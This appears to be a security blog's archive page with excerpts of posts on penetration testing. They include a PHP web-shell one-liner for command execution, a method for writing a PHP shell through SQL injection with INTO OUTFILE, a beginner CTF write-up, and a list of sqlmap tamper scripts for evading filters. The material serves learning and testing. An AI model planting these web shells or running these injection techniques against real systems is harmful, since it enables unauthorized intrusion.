Skip to main content

Posts

Showing posts from 2017

From SHELL to POWERSHELL

Just to keep for my notes and reference. Because sometime hard to recall back on #HowTo See 'clam' for more and `bash' for a shell script! ___ .-"; ! ;"-. .'! : | : !`. /\ ! : ! : ! /\ /\ | ! :|: ! | /\ ( \ \ ; :!: ; / / ) ( `. \ | !:|:! | / .' ) (`. \ \ \!:|:!/ / / .') \ `.`.\ |!|! |/,'.' / `._`.\\\!!!// .'_.' `.`.\\|//.'.' |`._`n'_.'| hjw "----^----" Ok, let's assume that we are able to inject some malicious payload/code like using phpMyAdmin or whatever low-hanging fruits on the target SQLi, RCE or whatever. 1. For PHP these are the useful code: ======== PHP Info ======== <? phpinfo(); ?> This might be useful for us to identify file path and default folder etc. ================ Simple PHP Backdoor ================ <?php system($_GET['cmd']); ? > or <?php if(isset($_REQUEST[&#

SQLiiiii

This is an re-post from an old archive ... From MySQL documentation : "The SELECT ... INTO OUTFILE 'file_name' form of SELECT writes the selected rows to a file. The file is created on the server host, so you must have the FILE privilege to use this syntax. file_name cannot be an existing file, which among other things prevents files such as /etc/passwd and database tables from being destroyed. As of MySQL 5.0.19, the character_set_filesystem system variable controls the interpretation of the filename." The INTO OUTFILE operator can be used during sql injection exploiting to write php shell on remote host. Unfortunately (fortunately?) this is only possible in some (very) race conditions : mysql user must have the FILE privilege; the operator requires a "quoted" file pathname, so the web application should not escape/filter them; httpd and mysql should be installed on the same machine, or (if you can) the file will be written on the dbms machi

CTF Politeknik Mersing 2017 Writeups

Some writeups for CTF Politeknik Mersing 2017. Honestly, I'm not really expert and experience guy in crafting and create a CTF question challenges. But for this competition,  my intention is only meant for begineers folks. And susprisingly some of them are able to answers it and not. By putting some basic cryptography elements + basic exploitation which is based on Metasploitable2 vulnerable Images.  Ok, here are the list of questions and challenges for the event: Information Gathering 1. Mesej Tersembunyi (Flag 1) 2. Mesej Tersembunyi lagi (Flag 2) Exploitation 1. Mencari Kucing sesat (Flag 3) 2. Tidak Benar Belaka (Flag 4) 3. Tiga Abdul - Abdul Wahab, Abdul Wahib & Abdul Wahub (Flag 5) Forensic Challenge 1. Image Forensic - Steganography  With total of 6 challenges! All you have to do is own this box in order to get all the flags except for Steganography. Flag 1: Mesej Tersembunyi Viewing the source from browser we found this. &

List of SQLMAP Tamper Scripts

Just re-post one of my visited reference blog post: Original URL: http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html Name Description Example apostrophemask.py Replaces apostrophe character with its UTF-8 full width counterpart '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' apostrophenullencode.py Replaces apostrophe character with its illegal double unicode counterpart '1 AND %271%27=%271' appendnullbyte.py Appends encoded NULL byte character at the end of payload '1 AND 1=1' base64encode.py Base64 all characters in a given payload 'MScgQU5EIFNMRUVQKDUpIw==' between.py Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' '1 AND A NOT BETWEEN 0 AND B--' bluecoat.py Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator 'SELECT%09id FROM users where id LIKE 1' chardoubleencode.py Double url-encodes all character